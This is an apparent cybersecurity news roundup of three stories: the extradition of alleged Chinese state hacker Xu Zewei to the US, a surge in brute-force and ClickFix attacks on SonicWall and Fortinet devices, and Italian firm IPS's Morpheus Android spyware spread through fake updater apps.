Alleged Chinese State-Sponsored Hacker Extradited to the United States After Italian Arrest

A man suspected of orchestrating cyberattacks on behalf of Beijing has been extradited to the United States, where he now faces serious federal charges. Chinese hacker extradited Xu Zewei, a contractor allegedly working for China’s Ministry of State Security, could spend more than a decade behind bars if convicted. His case underscores the growing tension between Washington and Beijing over state-backed digital espionage.

The Extradition Journey: From Italy to Houston

Xu was taken into custody in Italy last year at the request of U.S. authorities. His Italian attorney, Simona Candido, confirmed to TechCrunch that he was handed over to American officials on Saturday. He now sits in the Federal Detention Center in Houston, Texas, according to the U.S. Bureau of Prisons database.

Following this development, the Justice Department formally announced Xu’s extradition in a press release. His U.S. lawyer, Dan Cogdell, told TechCrunch that Xu pleaded not guilty to all charges during a Monday morning court hearing. Court records show he appeared for his initial federal hearing and was remanded into custody.

Alleged Cyberattacks on Universities and Microsoft Exchange Servers

Prosecutors allege that Xu, along with co-conspirator Zhang Yu, targeted several American universities in early 2020. Their goal? To steal sensitive research related to the COVID-19 pandemic. This was just the beginning. The duo is also accused of hacking thousands of email servers running Microsoft Exchange starting in March 2021, as part of a widespread campaign linked to the Chinese-backed hacking group Hafnium, later dubbed Silk Typhoon.

According to the Justice Department, Xu worked for Shanghai Powerock Network, a company that prosecutors say conducted hacking operations for Beijing. The hackers allegedly reported directly to Chinese state officials in Shanghai. The Hafnium group exploited previously unknown security flaws in Microsoft Exchange servers, targeting American defense contractors, law firms, think tanks, and infectious disease researchers.

Prosecutors claim the group targeted more than 60,000 entities in the U.S. and successfully breached over 12,700 of them. This means that the scale of the operation was vast, affecting critical infrastructure and intellectual property.

China’s Response and Diplomatic Fallout

The Chinese Embassy in Washington, D.C., did not respond to requests for comment. However, the Financial Times reported that the Chinese Foreign Ministry opposed Xu’s extradition, accusing the U.S. government of fabricating cases. This is not the first time Beijing has pushed back against such allegations, often framing them as politically motivated.

For years, the U.S. government has charged suspected Chinese hackers, though many remain at large. In 2022, Yanjun Xu was sentenced to 20 years in prison for hacking crimes, marking what the DOJ called the first case where a Chinese government intelligence officer had been extradited to the United States. This latest extradition signals a continued effort by Washington to hold state-sponsored hackers accountable.

What This Means for Cybersecurity and International Law

This case highlights the challenges of prosecuting cybercriminals who operate across borders. The extradition of a Chinese hacker to the US is a rare but significant step. It demonstrates that international cooperation can still work, even in the murky world of state-sponsored cyberattacks. However, it also raises questions about the effectiveness of such actions in deterring future attacks.

As cyber threats grow more sophisticated, governments must adapt their legal frameworks. The US Justice Department has made it a priority to pursue hackers who target American institutions. Yet, without consistent global cooperation, many perpetrators remain beyond reach.

For more insights on cybersecurity trends, read our analysis on the evolving cyber threat landscape. Additionally, explore how state-sponsored hacking tactics are changing the game for national security.

Conclusion: A Precedent for Future Cases?

Xu Zewei’s extradition marks a milestone in the fight against state-sponsored cybercrime. While he has pleaded not guilty, the evidence against him is substantial. As the trial unfolds, the world will be watching to see whether this sets a precedent for holding Chinese hackers accountable in U.S. courts. For now, the message is clear: the United States is willing to go to great lengths to protect its digital borders.

Sharp Rise in Brute-Force Attacks Targets SonicWall and Fortinet Devices, Researchers Warn

Security researchers have observed a dramatic increase in brute-force attacks aimed at compromising SonicWall and Fortinet devices. According to a new report from Barracuda Networks, the vast majority of these attempts—88%—appear to originate from the Middle East. While many attacks were blocked, the trend signals a growing threat to perimeter security.

What Drives the Surge in Brute-Force Attacks?

Barracuda’s analysis reveals that most of these brute-force attacks were unsuccessful, either thwarted by security tools or targeting invalid usernames. However, the timing is noteworthy. The spike coincides with heightened US and Israeli hostilities against Iran, suggesting a possible geopolitical motive. Attackers may be routing traffic through Middle Eastern servers, but the pattern raises alarms about state-linked cyber activity.

In recent weeks, Iranian-affiliated hackers have targeted US critical infrastructure and medtech firms. The line between state-sponsored operations and financially motivated cybercrime continues to blur, as seen with the resurgence of the Pay2Key ransomware group. For more context, read our analysis on hybrid Middle East conflicts triggering global cyber activity.

Why Edge Devices Are Prime Targets

Edge devices like VPNs and firewalls from SonicWall and Fortinet are internet-facing yet provide direct access to corporate networks. This makes them attractive targets for brute-force attacks. Barracuda reports that over half (56%) of all confirmed incidents from February to March involved such attacks.

“Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials,” warns Laila Mubashar, senior cybersecurity analyst at Barracuda. “Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.”

How to Protect Your Network

To defend against these threats, organizations should take immediate action:

• Enforce strong, unique passwords on all network and security devices.
• Enable multi-factor authentication (MFA) on all VPNs, firewalls, and remote access services.
• Monitor and investigate repeated failed login attempts.
• Restrict management interfaces to trusted IP ranges where possible.

For additional guidance, check out our network security best practices guide.

The Rise of ClickFix Social Engineering Attacks

Alongside the brute-force attacks, Barracuda highlights a surge in ClickFix attacks. These social engineering schemes trick users into copying and executing malicious scripts under the guise of fixing a non-existent technical issue. Mubashar explains that such attacks exploit user trust and anxiety.

“Attackers use familiar elements like pop-ups, prompts, and instructions to run a fix,” she adds. “Because ClickFix attacks rely on duping users into adding malicious commands themselves, they are harder for automated security systems to spot.”

To mitigate this threat, organizations should improve end-user education, restrict who can run PowerShell or command-line tools, and deploy monitoring tools for unusual behavior. Learn more about social engineering defense strategies.

Final Thoughts on the Growing Threat Landscape

The surge in brute-force attacks on SonicWall and Fortinet devices underscores the importance of robust perimeter security. As geopolitical tensions rise, attackers are becoming more persistent and sophisticated. By implementing strong authentication measures and educating users, organizations can reduce their risk of compromise.

Italian Spyware Maker IPS Exposed for Distributing Fake Android Surveillance Apps

Another Italian spyware maker has been caught in the act, this time distributing fake Android apps to install surveillance software on unsuspecting targets. A new report from Osservatorio Nessuno, an Italian digital rights organization, reveals how the company IPS used a deceptive phone-updating app to deploy its Morpheus spyware.

The discovery highlights the growing demand for spyware among law enforcement and intelligence agencies worldwide. As a result, numerous companies are quietly supplying these tools, often operating far from public scrutiny.

How the Morpheus Spyware Works

According to the researchers, Morpheus is a “low cost” spyware that relies on tricking victims into installing it themselves. Unlike advanced spyware from firms like NSO Group or Paragon Solutions, which use invisible zero-click attacks, Morpheus depends on social engineering.

In this case, the target’s mobile provider deliberately blocked their data connection. Then, the telecom sent an SMS urging the victim to install a fake app to restore cellular access. This strategy has been documented in other cases involving Italian spyware makers.

Once installed, the malware abused Android’s accessibility features to read screen data and interact with other apps. It then prompted a fake update, showed a reboot screen, and spoofed WhatsApp to request biometric authentication. Unbeknownst to the target, this granted the spyware full access to their WhatsApp account.

IPS: An Old Company with a New Spyware Product

Osservatorio Nessuno’s researchers, identified only as Davide and Giulio, linked the spyware to IPS based on its infrastructure. One IP address was registered to “IPS Intelligence Public Security.” Additionally, the malware code contained Italian phrases, including references to Gomorra and “spaghetti” — a common trait among Italian spyware makers.

IPS has operated for over 30 years, providing traditional lawful interception technology to governments. Its website lists several Italian police forces as customers and claims operations in more than 20 countries. However, the company did not respond to requests for comment about the spyware report.

The Target: Political Activism in Italy

Davide and Giulio could not reveal specific details about the target but believe the attack is “related to political activism” in Italy. They noted that such targeted attacks are increasingly common in this sphere.

A researcher at a cybersecurity firm, who reviewed the report, confirmed that the malware was definitely developed by an Italian surveillance tech maker. This aligns with a broader trend of Italian firms filling the void left by Hacking Team, one of the first spyware makers globally.

The Rise of Italian Spyware Makers

IPS joins a long list of Italian spyware makers exposed in recent years, including CY4GATE, eSurv, GR Sistemi, Movia, Negg, Raxir, RCS Lab, and SIO. Earlier this month, WhatsApp notified around 200 users who installed a fake version of the app, which was actually spyware made by SIO.

In 2021, Italian prosecutors suspended their use of CY4GATE and SIO spyware due to serious malfunctions. This pattern raises questions about the oversight and regulation of surveillance technology in Italy and beyond.

Building on these findings, it’s clear that the demand for government spyware continues to drive innovation in deception tactics. For more insights, explore our guide on how to protect Android from spyware. Additionally, learn about understanding lawful interception technology to grasp the legal landscape.

In conclusion, the exposure of IPS demonstrates that even established companies are turning to covert methods to meet the demands of law enforcement. As a result, users must remain vigilant against fake apps and suspicious messages, especially those claiming to fix network issues.